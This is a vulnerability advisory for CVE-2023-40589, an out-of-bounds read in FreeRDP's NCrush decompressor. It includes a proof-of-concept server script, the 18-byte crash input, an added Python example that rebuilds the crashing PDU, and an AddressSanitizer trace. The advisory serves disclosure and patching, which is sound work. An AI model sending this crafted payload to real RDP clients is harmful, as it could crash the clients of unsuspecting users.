CVE-2023-40589: Global-Buffer-Overflow in ncrush_decompress

FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions there is a global-buffer-overflow in the ncrush_decompress function: crafted compressed data makes the RDP 6.0 bulk decompressor (NCrush) read past the end of one of its global lookup tables. A malicious or compromised server can send such data to a connecting client. The overflow has only been shown to cause a crash (the AddressSanitizer report below records a 4-byte out-of-bounds read, not a write). This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.

Affected versions

<= 2.10.0, <= 3.0.0-beta2

Patched versions

2.11.0, 3.0.0-beta3

Summary

Global-Buffer-Overflow in ncrush_decompress

Affected

FreeRDP based clients only. The FreeRDP proxy is not affected, since it passes the data through without decoding it.

PoC

import asyncio

async def poc(self: XRDPProcess):
    # Harness helpers (XRDPProcess, Stream, xrdp_sec_init, xrdp_sec_send,
    # s_mark_end, PDUTYPE_DATAPDU, MCS_GLOBAL_CHANNEL) belong to the
    # researcher's xrdp-based test server and are not shown on this page.
    await asyncio.sleep(3)
    s = Stream.create(8192)
    xrdp_sec_init(self.session.rdp.sec_layer, s)

    # TS_SHARECONTROLHEADER
    length_p = s.p
    s.write_uint16(0x0)  # totalLength, set later
    s.write_uint16(PDUTYPE_DATAPDU)
    s.write_uint16(self.session.rdp.mcs_channel)  # pduSource

    with open(
            'crash-71ed942cc89efe9dfbca9184918d72ed681b929d',
            'rb') as f:
        xcrush_data = f.read()

    # TS_SHAREDATAHEADER
    PACKET_COMPRESSED = 0x20
    PACKET_COMPR_TYPE_RDP6 = 0x2
    s.write_uint32(0x12345678)  # shareId
    s.write_uint8(0x99)  # pad1
    s.write_uint8(0x87)  # streamId
    s.write_uint16(0x6543)  # uncompressedLength, set later
    s.write_uint8(0x21)  # pduType2
    s.write_uint8(PACKET_COMPRESSED | PACKET_COMPR_TYPE_RDP6)  # compressedType
    s.write_uint16(len(xcrush_data) + 18)  # compressedLength, counts the 18-byte header too
    s.write(xcrush_data)
    s_mark_end(s)

    # patch in totalLength now that the end of the PDU is known
    s.p = length_p
    s.write_uint16(s.end - length_p)

    xrdp_sec_send(self.session.rdp.sec_layer, s, chan=MCS_GLOBAL_CHANNEL)

crash-71ed942cc89efe9dfbca9184918d72ed681b929d (od -x listing of the 18-byte file)

0000000 1db4 5d83 e45a 2e1d b5c7 f82b beb7 ffbd
0000010 002f
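The PoC above only runs inside the researcher's xrdp test harness. The following stand-alone Python is an added example, not code from the advisory or from FreeRDP: it decodes the od -x listing of the crash file back into bytes, serialises the same TS_SHARECONTROLHEADER and TS_SHAREDATAHEADER the PoC writes, and parses them back the way a receiving client does. That makes the one field that matters visible: compressedType = PACKET_COMPRESSED | PACKET_COMPR_TYPE_RDP6 sends the 18-byte payload to the RDP 6.0 (NCrush) bulk decompressor before anything else in the PDU is interpreted, which is the path the stack trace below shows (rdp_recv_data_pdu -> bulk_decompress -> ncrush_decompress). The pduSource value 1002 and the share id 0x12345678 are assumptions (the PoC takes them from its session), and all function and variable names are the example's own.

```python
import struct

# Constants from MS-RDPBCGR (TS_SHARECONTROLHEADER / TS_SHAREDATAHEADER).
PDUTYPE_DATAPDU = 0x7
TS_PROTOCOL_VERSION = 0x1          # occupies bits 4-7 of pduType
PACKET_COMPRESSED = 0x20           # compressedType flag: payload is compressed
COMPRESSION_TYPE_MASK = 0x0F       # low nibble of compressedType selects the codec
PACKET_COMPR_TYPE_RDP6 = 0x02      # RDP 6.0 bulk compression (NCrush)
SHARE_DATA_HEADER_LEN = 18         # 6-byte control header + 12-byte data header

# Constructed copy of the od -x listing of the crash file shown above;
# each word holds two bytes in little-endian order.
OD_LISTING = """\
0000000 1db4 5d83 e45a 2e1d b5c7 f82b beb7 ffbd
0000010 002f
"""


def od_x_to_bytes(listing: str) -> bytes:
    """Turn an `od -x` listing back into the raw bytes it describes."""
    out = bytearray()
    for line in listing.splitlines():
        fields = line.split()
        for word in fields[1:]:          # fields[0] is the octal offset
            out += struct.pack("<H", int(word, 16))
    return bytes(out)


CRASH_BYTES = od_x_to_bytes(OD_LISTING)


def build_share_data_pdu(payload: bytes, pdu_source: int, share_id: int,
                         compressed_type: int = PACKET_COMPRESSED | PACKET_COMPR_TYPE_RDP6,
                         pdu_type2: int = 0x21) -> bytes:
    """Serialise the same headers the PoC writes in front of the crash bytes."""
    total_len = SHARE_DATA_HEADER_LEN + len(payload)
    control_hdr = struct.pack("<HHH", total_len,
                              (TS_PROTOCOL_VERSION << 4) | PDUTYPE_DATAPDU,
                              pdu_source)
    data_hdr = struct.pack("<IBBHBBH",
                           share_id,
                           0x99,        # pad1, value as in the PoC
                           0x87,        # streamId, value as in the PoC
                           0x6543,      # uncompressedLength, value as in the PoC
                           pdu_type2,   # decompression happens before this is dispatched
                           compressed_type,
                           total_len)   # compressedLength counts the 18-byte header, as the PoC does
    return control_hdr + data_hdr + payload


def parse_share_data_header(pdu: bytes) -> dict:
    """Decode the headers as a receiving client does, with the length checks a
    decoder should make before handing the payload to a codec."""
    if len(pdu) < SHARE_DATA_HEADER_LEN:
        raise ValueError("truncated share data header")
    (total_len, pdu_type, pdu_source, share_id, _pad1, stream_id,
     uncompressed_len, pdu_type2, compressed_type,
     compressed_len) = struct.unpack_from("<HHHIBBHBBH", pdu, 0)
    if pdu_type & 0x0F != PDUTYPE_DATAPDU:
        raise ValueError(f"not a data PDU: pduType=0x{pdu_type:04x}")
    if total_len != len(pdu) or compressed_len > total_len:
        raise ValueError("length fields disagree with the received size")
    return {
        "pdu_source": pdu_source,
        "share_id": share_id,
        "stream_id": stream_id,
        "uncompressed_length": uncompressed_len,
        "pdu_type2": pdu_type2,
        "compressed": bool(compressed_type & PACKET_COMPRESSED),
        "compression_type": compressed_type & COMPRESSION_TYPE_MASK,
        "compressed_length": compressed_len,
        "payload": pdu[SHARE_DATA_HEADER_LEN:],
    }


def routes_to_ncrush(header: dict) -> bool:
    """True when a client would hand the payload to the RDP 6.0 (NCrush) decoder."""
    return header["compressed"] and header["compression_type"] == PACKET_COMPR_TYPE_RDP6


if __name__ == "__main__":
    # pdu_source 1002 and the share id are assumed values, see the lead-in.
    pdu = build_share_data_pdu(CRASH_BYTES, pdu_source=1002, share_id=0x12345678)
    hdr = parse_share_data_header(pdu)
    print(f"{len(pdu)} bytes, ncrush={routes_to_ncrush(hdr)}, payload={hdr['payload'].hex()}")
```

The length checks in parse_share_data_header are the ones a receiver can make from the header alone; they pass for this PDU, which is the point: the crashing input is a well-formed 36-byte data PDU whose only unusual property is its compressed payload, so the decompressor itself has to bound its table lookups.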

Impact

None

ASan

==8831==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001062a1f7c at pc 0x000105f02eb0 bp 0x00016b35de70 sp 0x00016b35de68
READ of size 4 at 0x0001062a1f7c thread T4
#0 0x105f02eac in ncrush_decompress+0x10f8 (libfreerdp3.3.0.0.dylib:arm64+0x2eeac) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#1 0x105f214e8 in bulk_decompress+0x310 (libfreerdp3.3.0.0.dylib:arm64+0x4d4e8) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#2 0x106179f1c in rdp_recv_data_pdu+0x5f8 (libfreerdp3.3.0.0.dylib:arm64+0x2a5f1c) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#3 0x1061853f4 in rdp_recv_tpkt_pdu+0x9d8 (libfreerdp3.3.0.0.dylib:arm64+0x2b13f4) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#4 0x1061849c4 in rdp_recv_pdu+0x34 (libfreerdp3.3.0.0.dylib:arm64+0x2b09c4) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#5 0x106180280 in rdp_recv_callback_int+0x1408 (libfreerdp3.3.0.0.dylib:arm64+0x2ac280) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#6 0x10617eda8 in rdp_recv_callback+0x1d8 (libfreerdp3.3.0.0.dylib:arm64+0x2aada8) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#7 0x1061a5508 in transport_check_fds+0x51c (libfreerdp3.3.0.0.dylib:arm64+0x2d1508) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#8 0x106180b88 in rdp_check_fds+0x170 (libfreerdp3.3.0.0.dylib:arm64+0x2acb88) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#9 0x10611b584 in freerdp_check_fds+0x1ac (libfreerdp3.3.0.0.dylib:arm64+0x247584) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#10 0x10611bc54 in freerdp_check_event_handles+0x70 (libfreerdp3.3.0.0.dylib:arm64+0x247c54) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#11 0x104da3d94 in mac_client_thread+0x5a4 (MacFreeRDP:arm64+0x13d94) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#12 0x106a29630 in thread_launcher thread.c:520
#13 0x1825a7fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#14 0xa27a0001825a2d9c  (<unknown module>)

0x0001062a1f7c is located 36 bytes before global variable 'LOMBaseLUT' defined in '/Users/sprout/Desktop/pwn2car/FreeRDP/libfreerdp/codec/ncrush.c' (0x1062a1fa0) of size 120
0x0001062a1f7c is located 4 bytes after global variable 'LOMBitsLUT' defined in '/Users/sprout/Desktop/pwn2car/FreeRDP/libfreerdp/codec/ncrush.c' (0x1062a1f00) of size 120
SUMMARY: AddressSanitizer: global-buffer-overflow (libfreerdp3.3.0.0.dylib:arm64+0x2eeac) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00) in ncrush_decompress+0x10f8
Shadow bytes around the buggy address:
0x0001062a1c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0001062a1e80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0001062a1f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0001062a1f80: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a2000: 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0001062a2080: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
0x0001062a2100: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0001062a2180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable:           00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone:       fa
Freed heap region:       fd
Stack left redzone:      f1
Stack mid redzone:       f2
Stack right redzone:     f3
Stack after return:      f5
Stack use after scope:   f8
Global redzone:          f9
Global init order:       f6
Poisoned by user:        f7
Container overflow:      fc
Array cookie:            ac
Intra object redzone:    bb
ASan internal:           fe
Left alloca redzone:     ca
Right alloca redzone:    cb
Thread T4 created by T0 here:
#0 0x106faa91c in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4a91c) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
#1 0x106a266b0 in winpr_StartThread thread.c:568
#2 0x106a25d84 in CreateThread thread.c:650
#3 0x104da34f8 in -[MRDPView rdpStart:]+0x964 (MacFreeRDP:arm64+0x134f8) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#4 0x104da2948 in mfreerdp_client_start+0x488 (MacFreeRDP:arm64+0x12948) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#5 0x104d97b1c in freerdp_client_start+0x134 (MacFreeRDP:arm64+0x7b1c) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#6 0x104cd278c in -[AppDelegate applicationDidFinishLaunching:]+0x53c (MacFreeRDP:arm64+0x10000678c) (BuildId: f5262c7b1c22379cbcc0c60e07db60fc32000000200000000100000000000d00)
#7 0x18267b17c in __CFNOTIFICATIONCENTER_IS_CALLING_OUT_TO_AN_OBSERVER__+0x90 (CoreFoundation:arm64+0x7417c) (BuildId: 203e44018c2e3157a24b92f52551d43e32000000200000000100000000040d00)
#8 0xcf48000182716ee8  (<unknown module>)
#9 0xec26800182716e30  (<unknown module>)
#10 0xc41a80018264c4c8  (<unknown module>)
#11 0xff3c0001835aa8f0  (<unknown module>)
#12 0xb5708001858ad154  (<unknown module>)
#13 0xb94c8001858acf04  (<unknown module>)
#14 0xca1c0001858aafa0  (<unknown module>)
#15 0xf6088001858aab9c  (<unknown module>)
#16 0x333b8001835d4b60  (<unknown module>)
#17 0x40068001835d49c0  (<unknown module>)
#18 0x8d140001889ad514  (<unknown module>)
#19 0x6a218001889ace40  (<unknown module>)
#20 0xff078001889a5f14  (<unknown module>)
#21 0x975180018bedeb40  (<unknown module>)
#22 0x10650001858a6044  (<unknown module>)
#23 0x727e8001858a4edc  (<unknown module>)
#24 0x6b56800185899340  (<unknown module>)
#25 0x4925000185870790  (<unknown module>)
#26 0x8b79000104cd2020  (<unknown module>)
#27 0x18224ff24  (<unknown module>)
#28 0x1e1efffffffffffc  (<unknown module>)

Related news

Gentoo Linux Security Advisory 202401-16

Gentoo Linux Security Advisory 202401-16 - Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution. Versions prior to 2.11.0 are affected.

Ubuntu Security Notice USN-6401-1

Ubuntu Security Notice 6401-1 - It was discovered that FreeRDP did not properly manage certain inputs. A malicious server could use this issue to cause FreeRDP clients to crash, resulting in a denial of service, or possibly obtain sensitive information. It was discovered that FreeRDP did not properly manage certain inputs. A malicious server could use this issue to cause FreeRDP clients to crash, resulting in a denial of service, or possibly execute arbitrary code.
